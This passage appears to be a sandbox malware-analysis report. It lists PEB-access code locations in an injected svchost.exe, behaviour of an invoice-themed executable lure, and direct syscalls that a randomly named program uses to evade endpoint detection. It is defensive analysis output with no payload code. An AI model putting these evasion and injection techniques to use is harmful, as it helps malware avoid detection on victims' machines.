Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]	6_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]	6_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]	6_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]	6_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]	6_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034EA456 mov eax, dword ptr fs:[00000030h]	6_2_034EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342645D mov eax, dword ptr fs:[00000030h]	6_2_0342645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345245A mov eax, dword ptr fs:[00000030h]	6_2_0345245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034BC460 mov ecx, dword ptr fs:[00000030h]	6_2_034BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345A470 mov eax, dword ptr fs:[00000030h]	6_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345A470 mov eax, dword ptr fs:[00000030h]	6_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345A470 mov eax, dword ptr fs:[00000030h]	6_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03468402 mov eax, dword ptr fs:[00000030h]	6_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03468402 mov eax, dword ptr fs:[00000030h]	6_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03468402 mov eax, dword ptr fs:[00000030h]	6_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342E420 mov eax, dword ptr fs:[00000030h]	6_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342E420 mov eax, dword ptr fs:[00000030h]	6_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342E420 mov eax, dword ptr fs:[00000030h]	6_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342C427 mov eax, dword ptr fs:[00000030h]	6_2_0342C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]	6_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]	6_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]	6_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]	6_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]	6_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]	6_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]	6_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346A430 mov eax, dword ptr fs:[00000030h]	6_2_0346A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034304E5 mov ecx, dword ptr fs:[00000030h]	6_2_034304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034EA49A mov eax, dword ptr fs:[00000030h]	6_2_034EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034364AB mov eax, dword ptr fs:[00000030h]	6_2_034364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034644B0 mov ecx, dword ptr fs:[00000030h]	6_2_034644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034BA4B0 mov eax, dword ptr fs:[00000030h]	6_2_034BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E4B4B mov eax, dword ptr fs:[00000030h]	6_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E4B4B mov eax, dword ptr fs:[00000030h]	6_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03502B57 mov eax, dword ptr fs:[00000030h]	6_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03502B57 mov eax, dword ptr fs:[00000030h]	6_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03502B57 mov eax, dword ptr fs:[00000030h]	6_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03502B57 mov eax, dword ptr fs:[00000030h]	6_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C6B40 mov eax, dword ptr fs:[00000030h]	6_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C6B40 mov eax, dword ptr fs:[00000030h]	6_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FAB40 mov eax, dword ptr fs:[00000030h]	6_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D8B42 mov eax, dword ptr fs:[00000030h]	6_2_034D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03428B50 mov eax, dword ptr fs:[00000030h]	6_2_03428B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DEB50 mov eax, dword ptr fs:[00000030h]	6_2_034DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342CB7E mov eax, dword ptr fs:[00000030h]	6_2_0342CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03504B00 mov eax, dword ptr fs:[00000030h]	6_2_03504B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]	6_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]	6_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]	6_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]	6_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]	6_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]	6_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]	6_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]	6_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]	6_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345EB20 mov eax, dword ptr fs:[00000030h]	6_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345EB20 mov eax, dword ptr fs:[00000030h]	6_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F8B28 mov eax, dword ptr fs:[00000030h]	6_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F8B28 mov eax, dword ptr fs:[00000030h]	6_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03450BCB mov eax, dword ptr fs:[00000030h]	6_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03450BCB mov eax, dword ptr fs:[00000030h]	6_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03450BCB mov eax, dword ptr fs:[00000030h]	6_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03430BCD mov eax, dword ptr fs:[00000030h]	6_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03430BCD mov eax, dword ptr fs:[00000030h]	6_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03430BCD mov eax, dword ptr fs:[00000030h]	6_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DEBD0 mov eax, dword ptr fs:[00000030h]	6_2_034DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03438BF0 mov eax, dword ptr fs:[00000030h]	6_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03438BF0 mov eax, dword ptr fs:[00000030h]	6_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03438BF0 mov eax, dword ptr fs:[00000030h]	6_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345EBFC mov eax, dword ptr fs:[00000030h]	6_2_0345EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034BCBF0 mov eax, dword ptr fs:[00000030h]	6_2_034BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440BBE mov eax, dword ptr fs:[00000030h]	6_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440BBE mov eax, dword ptr fs:[00000030h]	6_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	6_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	6_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]	6_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]	6_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]	6_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]	6_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]	6_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]	6_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]	6_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440A5B mov eax, dword ptr fs:[00000030h]	6_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440A5B mov eax, dword ptr fs:[00000030h]	6_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346CA6F mov eax, dword ptr fs:[00000030h]	6_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346CA6F mov eax, dword ptr fs:[00000030h]	6_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346CA6F mov eax, dword ptr fs:[00000030h]	6_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DEA60 mov eax, dword ptr fs:[00000030h]	6_2_034DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034ACA72 mov eax, dword ptr fs:[00000030h]	6_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034ACA72 mov eax, dword ptr fs:[00000030h]	6_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034BCA11 mov eax, dword ptr fs:[00000030h]	6_2_034BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346CA24 mov eax, dword ptr fs:[00000030h]	6_2_0346CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345EA2E mov eax, dword ptr fs:[00000030h]	6_2_0345EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03454A35 mov eax, dword ptr fs:[00000030h]	6_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03454A35 mov eax, dword ptr fs:[00000030h]	6_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346CA38 mov eax, dword ptr fs:[00000030h]	6_2_0346CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03486ACC mov eax, dword ptr fs:[00000030h]	6_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03486ACC mov eax, dword ptr fs:[00000030h]	6_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03486ACC mov eax, dword ptr fs:[00000030h]	6_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03430AD0 mov eax, dword ptr fs:[00000030h]	6_2_03430AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03464AD0 mov eax, dword ptr fs:[00000030h]	6_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03464AD0 mov eax, dword ptr fs:[00000030h]	6_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346AAEE mov eax, dword ptr fs:[00000030h]	6_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346AAEE mov eax, dword ptr fs:[00000030h]	6_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]	6_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]	6_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]	6_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]	6_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]	6_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]	6_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]	6_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]	6_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]	6_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03504A80 mov eax, dword ptr fs:[00000030h]	6_2_03504A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03468A90 mov edx, dword ptr fs:[00000030h]	6_2_03468A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03438AA0 mov eax, dword ptr fs:[00000030h]	6_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03438AA0 mov eax, dword ptr fs:[00000030h]	6_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03486AA4 mov eax, dword ptr fs:[00000030h]	6_2_03486AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B0946 mov eax, dword ptr fs:[00000030h]	6_2_034B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03504940 mov eax, dword ptr fs:[00000030h]	6_2_03504940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03456962 mov eax, dword ptr fs:[00000030h]	6_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03456962 mov eax, dword ptr fs:[00000030h]	6_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03456962 mov eax, dword ptr fs:[00000030h]	6_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0347096E mov eax, dword ptr fs:[00000030h]	6_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0347096E mov edx, dword ptr fs:[00000030h]	6_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0347096E mov eax, dword ptr fs:[00000030h]	6_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D4978 mov eax, dword ptr fs:[00000030h]	6_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D4978 mov eax, dword ptr fs:[00000030h]	6_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034BC97C mov eax, dword ptr fs:[00000030h]	6_2_034BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AE908 mov eax, dword ptr fs:[00000030h]	6_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AE908 mov eax, dword ptr fs:[00000030h]	6_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034BC912 mov eax, dword ptr fs:[00000030h]	6_2_034BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03428918 mov eax, dword ptr fs:[00000030h]	6_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03428918 mov eax, dword ptr fs:[00000030h]	6_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B892A mov eax, dword ptr fs:[00000030h]	6_2_034B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C892B mov eax, dword ptr fs:[00000030h]	6_2_034C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C69C0 mov eax, dword ptr fs:[00000030h]	6_2_034C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034649D0 mov eax, dword ptr fs:[00000030h]	6_2_034649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FA9D3 mov eax, dword ptr fs:[00000030h]	6_2_034FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034BE9E0 mov eax, dword ptr fs:[00000030h]	6_2_034BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034629F9 mov eax, dword ptr fs:[00000030h]	6_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034629F9 mov eax, dword ptr fs:[00000030h]	6_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]	6_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]	6_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]	6_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]	6_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]	6_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]	6_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]	6_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]	6_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]	6_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]	6_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]	6_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]	6_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]	6_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034309AD mov eax, dword ptr fs:[00000030h]	6_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034309AD mov eax, dword ptr fs:[00000030h]	6_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B89B3 mov esi, dword ptr fs:[00000030h]	6_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B89B3 mov eax, dword ptr fs:[00000030h]	6_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B89B3 mov eax, dword ptr fs:[00000030h]	6_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03442840 mov ecx, dword ptr fs:[00000030h]	6_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03460854 mov eax, dword ptr fs:[00000030h]	6_2_03460854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03434859 mov eax, dword ptr fs:[00000030h]	6_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03434859 mov eax, dword ptr fs:[00000030h]	6_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034BE872 mov eax, dword ptr fs:[00000030h]	6_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034BE872 mov eax, dword ptr fs:[00000030h]	6_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C6870 mov eax, dword ptr fs:[00000030h]	6_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C6870 mov eax, dword ptr fs:[00000030h]	6_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034BC810 mov eax, dword ptr fs:[00000030h]	6_2_034BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03452835 mov eax, dword ptr fs:[00000030h]	6_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03452835 mov eax, dword ptr fs:[00000030h]	6_2_03452835

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_007880A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

1_2_007880A9

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0075A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_0075A155
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0075A124 SetUnhandledExceptionFilter,		1_2_0075A124

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
